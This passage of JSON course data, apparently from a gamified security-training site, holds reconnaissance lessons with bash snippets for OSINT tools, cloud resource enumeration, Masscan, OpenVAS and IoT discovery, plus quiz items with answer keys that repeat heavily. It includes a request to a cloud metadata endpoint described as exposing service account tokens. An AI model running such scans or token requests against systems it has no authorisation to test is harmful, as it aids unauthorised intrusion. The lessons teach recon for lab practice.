SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-spiderfoot-osint","cat":"Reconnaissance","title":"SpiderFoot Automated OSINT","diff":3,"xp":200,"intro":"Run automated OSINT collection across hundreds of data sources.","sections":[{"type":"text","content":"SpiderFoot queries 200+ OSINT sources: DNS, WHOIS, breach data, social media, dark web, Shodan, VirusTotal \u2014 all from one tool."},{"type":"code","lang":"bash","content":"spiderfoot -s target.com -m all\nspiderfoot -s target.com -t EMAILADDR,INTERNET_NAME,IP_ADDRESS\n# Or use the web UI:\nspiderfoot -l 127.0.0.1:5001"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"SpiderFoot automates...","opts":["Port scanning","OSINT collection from 200+ data sources","Exploitation","Password cracking"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-recon-ng","cat":"Reconnaissance","title":"Recon-ng Framework","diff":2,"xp":150,"intro":"Modular reconnaissance framework with database tracking.","sections":[{"type":"text","content":"Recon-ng organizes recon into modules (like Metasploit for OSINT) and stores all findings in a local database for correlation."},{"type":"code","lang":"bash","content":"recon-ng\n[recon-ng][default] > marketplace install all\n[recon-ng][default] > modules search hackertarget\n[recon-ng][default] > modules load recon/domains-hosts/hackertarget\n[recon-ng][default] > options set SOURCE target.com\n[recon-ng][default] > run"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Recon-ng stores findings in...","opts":["Text files","A local database for correlation","Cloud storage","Memory only"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-asset-discovery-amass","cat":"Reconnaissance","title":"Amass Advanced Configuration","diff":3,"xp":200,"intro":"Configure Amass with API keys and data sources for comprehensive subdomain discovery.","sections":[{"type":"text","content":"Amass supports 40+ data sources. Configure API keys for SecurityTrails, Censys, Shodan, and VirusTotal for maximum coverage."},{"type":"code","lang":"bash","content":"amass enum -d target.com -config config.ini -o subs.txt\namass intel -whois -d target.com\namass viz -d target.com -d3"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Amass combines which two recon methods?","opts":["Scanning and exploitation","Passive data sources and active brute-forcing","Social engineering and phishing","Fuzzing and reverse engineering"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-cloud-azure-enum","cat":"Reconnaissance","title":"Azure Infrastructure Enumeration","diff":3,"xp":200,"intro":"Discover Azure resources: blobs, apps, databases, and functions.","sections":[{"type":"text","content":"Azure has predictable naming patterns. Enumerate blob storage, App Services, and SQL databases using common suffixes."},{"type":"code","lang":"bash","content":"# Azure blob storage\ncurl https://targetblob.blob.core.windows.net/public?restype=container&comp=list\n# Azure App Service\ncurl https://target-app.azurewebsites.net\n# Azure SQL\nnmap -p 1433 target.database.windows.net"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Azure blob storage URLs follow the pattern...","opts":["random.azure.com","name.blob.core.windows.net","storage.azure.net","blobs.microsoft.com"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-gcp-enum","cat":"Reconnaissance","title":"GCP Resource Enumeration","diff":3,"xp":200,"intro":"Discover Google Cloud resources: buckets, functions, and APIs.","sections":[{"type":"text","content":"GCP storage buckets, Cloud Functions, and App Engine apps follow predictable naming. The metadata endpoint reveals service account tokens."},{"type":"code","lang":"bash","content":"# GCP bucket check\ncurl https://storage.googleapis.com/target-bucket/\ngsutil ls gs://target-data/\n# GCP metadata (from inside)\ncurl -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"GCP metadata requests require which header?","opts":["Authorization: Bearer","Metadata-Flavor: Google","X-API-Key","Content-Type: json"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-network-scanning-masscan","cat":"Reconnaissance","title":"Masscan High-Speed Scanning","diff":2,"xp":150,"intro":"Scan millions of IPs per second for rapid discovery.","sections":[{"type":"text","content":"Masscan uses its own TCP/IP stack to scan the entire internet in under 6 minutes. Use for broad discovery, then nmap for detail."},{"type":"code","lang":"bash","content":"masscan 10.0.0.0/8 -p80,443,22 --rate=100000\nmasscan target -p1-65535 --rate=1000 -oL results.txt\n# Follow up with nmap\nnmap -sV -p $(cat results.txt | awk '{print $3}' | sort -u | tr '\\n' ',') target"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Masscan achieves speed by...","opts":["Using threads","Using its own custom TCP/IP stack","Scanning fewer ports","Using UDP"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-vuln-scan-openvas","cat":"Reconnaissance","title":"OpenVAS Vulnerability Scanner","diff":2,"xp":150,"intro":"Open-source vulnerability scanner for comprehensive security assessment.","sections":[{"type":"text","content":"OpenVAS (now Greenbone) tests for thousands of CVEs using regularly updated Network Vulnerability Tests (NVTs)."},{"type":"code","lang":"bash","content":"openvas-setup\nopenvas-start\n# Access web UI at https://localhost:9392\n# Or CLI:\nomp -u admin -w password -T\nomp -u admin -w password -C '<create_task>...'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"OpenVAS uses which test format?","opts":["YARA rules","Network Vulnerability Tests (NVTs)","Sigma rules","Snort rules"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-iot-discovery","cat":"Reconnaissance","title":"IoT Device Discovery","diff":3,"xp":200,"intro":"Find and fingerprint IoT devices on the network.","sections":[{"type":"text","content":"IoT devices run on unusual ports with specific protocols: UPnP (1900), MQTT (1883), CoAP (5683), Zigbee, Z-Wave. Many have default credentials."},{"type":"code","lang":"bash","content":"nmap -sU -p 1900,5353,1883,5683 target\nnmap --script upnp-info target\nnmap --script mqtt-subscribe -p 1883 target\nshodan search 'port:1883 MQTT'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"MQTT is commonly used by...","opts":["Web servers","IoT devices for messaging","Email servers","DNS servers"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network 